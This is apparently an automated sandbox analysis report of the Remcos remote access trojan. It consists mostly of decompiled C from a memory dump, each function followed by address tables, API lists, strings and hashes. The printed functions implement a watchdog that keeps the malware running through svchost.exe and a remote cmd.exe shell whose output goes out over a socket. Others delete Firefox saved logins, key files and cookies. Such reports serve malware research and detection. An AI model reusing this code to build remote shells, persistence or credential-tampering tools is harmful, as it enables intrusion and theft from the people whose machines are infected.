				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E004105A0(0x46c518, L00401F75(0x46c518), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E004020B5(0x46c518,  &_v100);
						E00417334(L00401ECB(0x46c500),  &_v100);
						L00401F4D(0x46c518,  &_v124);
						__eflags = L00416F6C( &_v124);
						if(__eflags != 0) {
							_t35 = E0040425F(0x46c518,  &_v76, L"\\SysWOW64");
							L00401EDA( &_v132, _t37, _t142, E00403010( &_v36, E0040425F(0x46c518,  &_v56, E0043918F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
							L00401ED0();
							L00401ED0();
						} else {
							_t61 = E0040425F(0x46c518,  &_v28, L"\\system32");
							L00401EDA( &_v132, _t63, _t142, E00403010( &_v84, E0040425F(0x46c518,  &_v56, E0043918F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
							L00401ED0();
							L00401ED0();
						}
						L00401ED0();
						E0040766E(0x46c518,  &_v124, 0, L"\\svchost.exe");
						_t143 = L00401F75( &_v104);
						_t46 = L00413ACA(L00401ECB( &_v128), _t143, 0x46bd50);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00402064(0x46c518, _t107, "Watchdog module activated");
							E00402064(0x46c518, _t150 - 0x18, "[Info]");
							E004165D8(0x46c518, 0);
							Sleep(0x7d0);
							_t112 =  *0x46bd58; // 0x0
							goto L13;
						}
						E00402064(0x46c518, _t107, "Watchdog launch failed!");
						E00402064(0x46c518, _t150 - 0x18, "[ERROR]");
						E004165D8(0x46c518, 0);
						CloseHandle( *0x46bd60);
						L00401ED0();
						L00401FA7();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00402064(0x46c518, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00402064(0x46c518, _t155 - 0x18, "[Info]");
						E004165D8(0x46c518, 0);
						E00402064(0x46c518, _t156 + 0x18, "Watchdog module activated");
						E00402064(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
						E004165D8(0x46c518, 0);
						CreateThread(0, 0, 0x40fae9, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00410275(L00401F75(0x46c518), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
							E004106D2(L00401F75(0x46c518), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46bd4e;
							if(__eflags != 0) {
								E0040F4B7(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}





































                              0x0040f4bd
                              0x0040f4c1
                              0x0040f4c3
                              0x0040f4e6
                              0x0040f4fd
                              0x0040f503
                              0x0040f505
                              0x0040f594
                              0x0040f5a9
                              0x0040f5b2
                              0x0040f5bc
                              0x0040f5be
                              0x0040f61b
                              0x0040f647
                              0x0040f650
                              0x0040f659
                              0x0040f5c0
                              0x0040f5c9
                              0x0040f5f5
                              0x0040f5fe
                              0x0040f607
                              0x0040f60c
                              0x0040f662
                              0x0040f670
                              0x0040f687
                              0x0040f692
                              0x0040f698
                              0x0040f69b
                              0x0040f69d
                              0x0040f69f
                              0x0040f6a6
                              0x0040f6b5
                              0x0040f6ba
                              0x0040f6c7
                              0x0040f6cd
                              0x00000000
                              0x0040f6cd
                              0x0040f6da
                              0x0040f6e9
                              0x0040f6ee
                              0x0040f6fc
                              0x0040f706
                              0x0040f70f
                              0x0040f714
                              0x0040f716
                              0x0040f50b
                              0x0040f50c
                              0x0040f512
                              0x0040f51c
                              0x0040f521
                              0x0040f52c
                              0x0040f531
                              0x0040f540
                              0x0040f54b
                              0x0040f550
                              0x0040f562
                              0x0040f56c
                              0x0040f57c
                              0x0040f583
                              0x0040f585
                              0x00000000
                              0x0040f58b
                              0x0040f733
                              0x0040f73f
                              0x0040f745
                              0x0040f749
                              0x0040f749
                              0x0040f74e
                              0x0040f74f
                              0x0040f750
                              0x0040f751
                              0x0040f753
                              0x0040f761
                              0x0040f766
                              0x0040f76d
                              0x0040f773
                              0x0040f77a
                              0x0040f77e
                              0x0040f77e
                              0x00000000
                              0x0040f77a
                              0x00000000
                              0x0040f585
                              0x0040f4e8
                              0x0040f4e8
                              0x0040f4ea
                              0x0040f71d
                              0x00000000

                              APIs
                              • GetCurrentProcessId.KERNEL32 ref: 0040F4C3
                                • Part of subcall function 004105A0: RegCreateKeyA.ADVAPI32(80000001,00000000,0045F6AC), ref: 004105AE
                                • Part of subcall function 004105A0: RegSetValueExA.ADVAPI32(0045F6AC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040AA06,0045FF08,00000001,000000AF,0045F6AC), ref: 004105C9
                                • Part of subcall function 004105A0: RegCloseKey.ADVAPI32(0045F6AC,?,?,?,0040AA06,0045FF08,00000001,000000AF,0045F6AC), ref: 004105D4
                              • OpenMutexA.KERNEL32 ref: 0040F4FD
                              • CloseHandle.KERNEL32(00000000), ref: 0040F50C
                              • CreateThread.KERNEL32(00000000,00000000,0040FAE9,00000000,00000000,00000000), ref: 0040F562
                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040F72A
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                              • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
                              • API String ID: 3018269243-3797382479
                              • Opcode ID: 9a450aa8e62453cedb2b6a9f1df7688fd550d8ff6fd6e02ad1a1d14d9fda7133
                              • Instruction ID: 06e747cae4c44867ce0b5dbd908e93f043d73082a9d6ea5748c6826fd798d0d4
                              • Opcode Fuzzy Hash: 9a450aa8e62453cedb2b6a9f1df7688fd550d8ff6fd6e02ad1a1d14d9fda7133
                              • Instruction Fuzzy Hash: 6751ED316043006BC618FB72DD1B86F77659E90759F50083FF942731E2EE789A0986AF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040559D, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283pipesleepfileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E0040559D(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x46dcd0 >  *((intOrPtr*)(_t138 + 4))) {
					L0042EA6C(0x46dcd0);
					_t160 =  *0x46dcd0 - _t147;
					if( *0x46dcd0 == _t147) {
						E00404818(0, 0x46dc48, 0);
						L0042EDF6(_t160, E00452023);
						 *_t156 = 0x46dcd0;
						L0042EA2D(_t147);
					}
				}
				if( *0x46dcb0 >  *((intOrPtr*)(_t138 + 4))) {
					L0042EA6C(0x46dcb0);
					_t162 =  *0x46dcb0 - _t147;
					if( *0x46dcb0 == _t147) {
						E004020B5(_t98, 0x46dcd8);
						L0042EDF6(_t162, E00452019);
						L0042EA2D(_t147, 0x46dcb0);
					}
				}
				_t100 =  &_v40;
				E004020B5(_t98,  &_v40);
				_t139 = 0x46c2d0;
				_v8 = _t98;
				_t163 =  *0x46bae2 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x46dcb8, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E00402064(_t98, _t156, 0x45f6ac);
						_push(0x62);
						_t147 = L00404A6E(_t98, 0x46dc48, _t136, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = L00438E06(_t100);
					_t140 = _t56;
					ReadFile( *0x46dcb8, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L00438E01(_t140);
						_t139 = 0x46c2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E00402064(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E004059C7(_t98, _t107, _t136, _t172);
						_t147 = L00404A6E(_t98, 0x46dc48, _t136, _t172, 0x62,  &_v64);
						L00401FA7();
						goto L19;
					}
					_t66 = L00438E20(_t140, L00401F75( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402064(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = L00405A22("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						L00404DD5(0x46dc48);
						CloseHandle( *0x46dcb8);
						CloseHandle( *0x46dcd4);
						 *0x46bae2 = _t98;
						_t98 = 1;
						L27:
						L00401FA7();
						L00401FA7();
						return _t98;
					}
					E004059BE(_t98, 0x46dcd8, E0043919A(_t98, _t164, "SystemDrive"));
					E004059B5(_t98, 0x46dcd8, 0x46c2d0, "\\");
					0x46dbf0->nLength = 0xc;
					 *0x46dbf8 = 1;
					 *0x46dbf4 = _t98;
					if(CreatePipe(0x46dccc, 0x46dcb4, 0x46dbf0, _t98) == 0 || CreatePipe(0x46dcb8, 0x46dcd4, 0x46dbf0, _t98) == 0) {
						goto L27;
					} else {
						_t151 = 0x44;
						E00431810(0x46dc00, 0x46dc00, _t98, CreatePipe);
						0x46dc00->cb = _t151;
						 *0x46dc2c = 0x101;
						 *0x46dc30 = 0;
						 *0x46dc38 =  *0x46dccc;
						_t79 =  *0x46dcd4;
						 *0x46dc3c = _t79;
						 *0x46dc40 = _t79;
						_t80 = L00401F75(0x46dcd8);
						 *0x46bae2 = CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc) != 0;
						E004059BE(_t98, 0x46c2d0, 0x45f6ac);
						 *0x46bae3 = 1;
						E00404955(0x46dc48);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E004049D2("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
						E004020CC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc),  &_a4);
						_push(0x93);
						_t100 = 0x46dc48;
						_t147 = L00404A6E(_t98, 0x46dc48, "cmd.exe", CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc));
						Sleep(0x12c);
						_t168 =  *0x46bae2 - _t98; // 0x0
						if(_t168 == 0) {
							goto L26;
						}
						_t139 = 0x46c2d0;
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							_t100 = _t139;
							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							if(E00402469() == 0) {
								_v8 = _t98;
							} else {
								E004059B5(_t98, _t139, _t139, "\n");
								L00401F8D( &_v40, _t139);
								_t52 = E00402469();
								WriteFile( *0x46dcb4, L00401F75(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E004059BE(_t98, _t139, 0x45f6ac);
							}
							Sleep(0x64);
							_t175 =  *0x46bae3 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x46dcbc->hProcess, _t98);
						CloseHandle( *0x46dcc0);
						CloseHandle( *0x46dcbc);
						goto L26;
					}
				}
			}





























                              0x004055a6
                              0x004055aa
                              0x004055ac
                              0x004055ae
                              0x004055b6
                              0x004055be
                              0x004055c5
                              0x004055cb
                              0x004055d1
                              0x004055d9
                              0x004055e3
                              0x004055e8
                              0x004055ef
                              0x004055f4
                              0x004055d1
                              0x00405600
                              0x00405608
                              0x0040560e
                              0x00405614
                              0x0040561b
                              0x00405625
                              0x0040562c
                              0x00405631
                              0x00405614
                              0x00405632
                              0x00405635
                              0x0040563a
                              0x0040563f
                              0x00405642
                              0x00405648
                              0x004057be
                              0x004057c2
                              0x004057cf
                              0x004057d8
                              0x0040587a
                              0x00405884
                              0x00405889
                              0x00405895
                              0x00000000
                              0x00405895
                              0x004057de
                              0x004057e1
                              0x004057e8
                              0x004057f8
                              0x00405801
                              0x0040586c
                              0x0040586d
                              0x00405873
                              0x00000000
                              0x00405873
                              0x00405806
                              0x0040583b
                              0x0040583f
                              0x00405844
                              0x00405847
                              0x00405849
                              0x0040584c
                              0x0040584d
                              0x00405851
                              0x00405865
                              0x00405867
                              0x00000000
                              0x00405867
                              0x00405815
                              0x0040581a
                              0x0040581d
                              0x0040581f
                              0x00000000
                              0x00000000
                              0x00405825
                              0x00405830
                              0x00405833
                              0x00405835
                              0x00405836
                              0x00000000
                              0x0040564e
                              0x0040564e
                              0x00405655
                              0x0040565a
                              0x0040565c
                              0x00405935
                              0x0040593a
                              0x00405945
                              0x00405951
                              0x00405957
                              0x0040595d
                              0x0040595f
                              0x00405962
                              0x0040596a
                              0x00405977
                              0x00405977
                              0x00405675
                              0x00405681
                              0x0040569d
                              0x004056a7
                              0x004056b1
                              0x004056bb
                              0x00000000
                              0x004056d7
                              0x004056d9
                              0x004056e2
                              0x004056ea
                              0x004056f2
                              0x004056fc
                              0x00405711
                              0x00405716
                              0x0040571c
                              0x00405721
                              0x00405726
                              0x0040574f
                              0x00405756
                              0x00405760
                              0x00405767
                              0x00405776
                              0x00405777
                              0x00405778
                              0x00405779
                              0x00405781
                              0x00405786
                              0x0040578f
                              0x00405794
                              0x00405799
                              0x004057a5
                              0x004057a7
                              0x004057ad
                              0x004057b3
                              0x00000000
                              0x00000000
                              0x004057b9
                              0x004057be
                              0x00000000
                              0x00405897
                              0x004058a2
                              0x004058a5
                              0x004058a7
                              0x004058b3
                              0x004058f9
                              0x004058b5
                              0x004058bc
                              0x004058c5
                              0x004058d1
                              0x004058e5
                              0x004058f0
                              0x004058f2
                              0x004058f2
                              0x004058fe
                              0x00405904
                              0x00405904
                              0x00405917
                              0x00405923
                              0x0040592f
                              0x00000000
                              0x0040592f
                              0x004056bb

                              APIs
                              • __Init_thread_footer.LIBCMT ref: 004055EF
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              • __Init_thread_footer.LIBCMT ref: 0040562C
                              • CreatePipe.KERNEL32(0046DCCC,0046DCB4,0046DBF0,00000000,0045F6C4,00000000), ref: 004056B7
                              • CreatePipe.KERNEL32(0046DCB8,0046DCD4,0046DBF0,00000000), ref: 004056CD
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046DC00,0046DCBC), ref: 00405740
                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 004057A7
                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004057CF
                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004057F8
                                • Part of subcall function 0042EDF6: __onexit.LIBCMT ref: 0042EDFC
                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6C8,00000062,0045F6AC), ref: 004058E5
                              • Sleep.KERNEL32(00000064,00000062,0045F6AC), ref: 004058FE
                              • TerminateProcess.KERNEL32(00000000), ref: 00405917
                              • CloseHandle.KERNEL32 ref: 00405923
                              • CloseHandle.KERNEL32 ref: 0040592F
                              • CloseHandle.KERNEL32 ref: 00405945
                              • CloseHandle.KERNEL32 ref: 00405951
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                              • String ID: SystemDrive$cmd.exe
                              • API String ID: 2994406822-3633465311
                              • Opcode ID: f3f296f1679a69185446eb36fae990717c7b1ee753301a2b67895b627e89174f
                              • Instruction ID: 36aeaf24663ea89ca73ce0651989de9eb03545aec66eda9801f6c68c010dee92
                              • Opcode Fuzzy Hash: f3f296f1679a69185446eb36fae990717c7b1ee753301a2b67895b627e89174f
                              • Instruction Fuzzy Hash: 1391B371F00208ABD714BB669D4696E3B69EB45714B10407FF901B72E2EFB88D01DB5E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A3AF, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E0040A3AF(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E004020B5(__ebx,  &_v100);
				E004020B5(__ebx,  &_v76);
				E004020B5(__ebx,  &_v28);
				_t45 = E00402064(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FB1( &_v28, _t46, _t135, E004075C4(_t89,  &_v52, E0043919A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				L00401FA7();
				L00401FA7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(L00401F75(E0040755A( &_v124,  &_v28, _t142, "*")),  &_v468);
				L00401FA7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									L00401FB1( &_v100, _t61, _t136, E0040530D(_t89,  &_v52, E0040755A( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									L00401FA7();
									L00401FA7();
									_t128 = E0040755A( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									L00401FB1( &_v76, _t67, _t136, E0040530D(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									L00401FA7();
									L00401FA7();
									_t73 = DeleteFileA(L00401F75( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(L00401F75( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00402064(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					L0040AA8C(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00402064(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					L0040AA8C(_t89,  &_v28, _t143);
					L17:
					L00401FA7();
					L00401FA7();
					L00401FA7();
					return 1;
				}
			}

























                              0x0040a3af
                              0x0040a3af
                              0x0040a3af
                              0x0040a3bc
                              0x0040a3c4
                              0x0040a3cc
                              0x0040a3d9
                              0x0040a3f9
                              0x0040a401
                              0x0040a409
                              0x0040a41a
                              0x0040a437
                              0x0040a439
                              0x0040a43e
                              0x0040a441
                              0x0040a577
                              0x0040a577
                              0x0040a585
                              0x0040a587
                              0x00000000
                              0x00000000
                              0x0040a46a
                              0x0040a471
                              0x00000000
                              0x00000000
                              0x0040a477
                              0x0040a47d
                              0x0040a480
                              0x0040a48e
                              0x0040a48e
                              0x0040a494
                              0x0040a494
                              0x0040a496
                              0x0040a496
                              0x0040a49a
                              0x0040a49f
                              0x0040a4a2
                              0x0040a4a8
                              0x00000000
                              0x00000000
                              0x0040a4aa
                              0x0040a4ab
                              0x0040a4ae
                              0x00000000
                              0x00000000
                              0x0040a4b0
                              0x0040a4b9
                              0x0040a4b9
                              0x0040a4bb
                              0x0040a4eb
                              0x0040a4f3
                              0x0040a4fe
                              0x0040a51b
                              0x0040a52d
                              0x0040a538
                              0x0040a540
                              0x0040a54e
                              0x0040a554
                              0x0040a556
                              0x0040a558
                              0x0040a558
                              0x0040a567
                              0x0040a56d
                              0x0040a56f
                              0x0040a571
                              0x0040a571
                              0x0040a56f
                              0x00000000
                              0x0040a4bb
                              0x0040a4b4
                              0x0040a4b6
                              0x0040a4b6
                              0x00000000
                              0x0040a4b6
                              0x0040a486
                              0x0040a488
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040a488
                              0x0040a597
                              0x0040a59c
                              0x0040a5a5
                              0x00000000
                              0x0040a447
                              0x0040a448
                              0x0040a458
                              0x0040a45d
                              0x0040a5ab
                              0x0040a5ae
                              0x0040a5b6
                              0x0040a5be
                              0x0040a5c9
                              0x0040a5c9

                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A42E
                              • FindClose.KERNEL32(00000000), ref: 0040A448
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A57F
                              • FindClose.KERNEL32(00000000), ref: 0040A5A5
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                              • API String ID: 1164774033-3681987949
                              • Opcode ID: 97f7e2f54df5a1cdee6a28329f9dcdda7ea771a6a33053010f7c568708f73f53
                              • Instruction ID: fceb70f3503f9a85c82f74107e9b35daee5a72393052f256031c89f00bf2afe6
                              • Opcode Fuzzy Hash: 97f7e2f54df5a1cdee6a28329f9dcdda7ea771a6a33053010f7c568708f73f53
                              • Instruction Fuzzy Hash: 22513C309102195ACB14FBB1DC5AEEEB774AF11309F50017FE406B60E2EF7C5A49CA5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A5CA, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E0040A5CA(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E004020B5(0,  &_v52);
				E004020B5(0,  &_v28);
				_t35 = E00402064(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FB1( &_v28, _t36, _t109, E004075C4(0,  &_v76, E0043919A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				L00401FA7();
				L00401FA7();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(L00401F75(E0040755A( &_v100,  &_v28, _t116, "*")),  &_v444);
				L00401FA7();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E00402064(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						L0040AA8C(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E0040755A( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											L00401FB1( &_v52, _t59, _t110, E0040530D(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											L00401FA7();
											L00401FA7();
											__eflags = DeleteFileA(L00401F75( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402064(0, _t102);
					L0040AA8C(0, _t104, _t117);
					L18:
				}
				L19:
				L00401FA7();
				L00401FA7();
				return 1;
			}

























                              0x0040a5ca
                              0x0040a5ca
                              0x0040a5d8
                              0x0040a5e0
                              0x0040a5ed
                              0x0040a60d
                              0x0040a615
                              0x0040a61d
                              0x0040a62e
                              0x0040a64b
                              0x0040a64d
                              0x0040a652
                              0x0040a655
                              0x0040a688
                              0x0040a68a
                              0x0040a756
                              0x0040a760
                              0x0040a765
                              0x0040a76e
                              0x00000000
                              0x0040a690
                              0x0040a690
                              0x0040a692
                              0x0040a692
                              0x0040a699
                              0x00000000
                              0x0040a69f
                              0x0040a69f
                              0x0040a6a5
                              0x0040a6a8
                              0x0040a6b6
                              0x0040a6b6
                              0x0040a6bc
                              0x0040a6be
                              0x0040a6be
                              0x0040a6c2
                              0x0040a6c7
                              0x0040a6ca
                              0x0040a6d0
                              0x00000000
                              0x00000000
                              0x0040a6d2
                              0x0040a6d3
                              0x0040a6d6
                              0x00000000
                              0x0040a6d8
                              0x0040a6d8
                              0x0040a6d8
                              0x0040a6e1
                              0x0040a6e1
                              0x0040a6e3
                              0x00000000
                              0x0040a6e5
                              0x0040a6fd
                              0x0040a70c
                              0x0040a714
                              0x0040a71c
                              0x0040a730
                              0x0040a732
                              0x0040a79a
                              0x0040a79c
                              0x00000000
                              0x0040a734
                              0x0040a734
                              0x0040a73b
                              0x0040a73e
                              0x0040a78f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040a73e
                              0x0040a732
                              0x00000000
                              0x0040a6e3
                              0x0040a6dc
                              0x0040a6de
                              0x0040a6de
                              0x00000000
                              0x0040a6aa
                              0x0040a6ae
                              0x0040a6b0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040a6b0
                              0x0040a6a8
                              0x00000000
                              0x0040a740
                              0x0040a74e
                              0x0040a74e
                              0x00000000
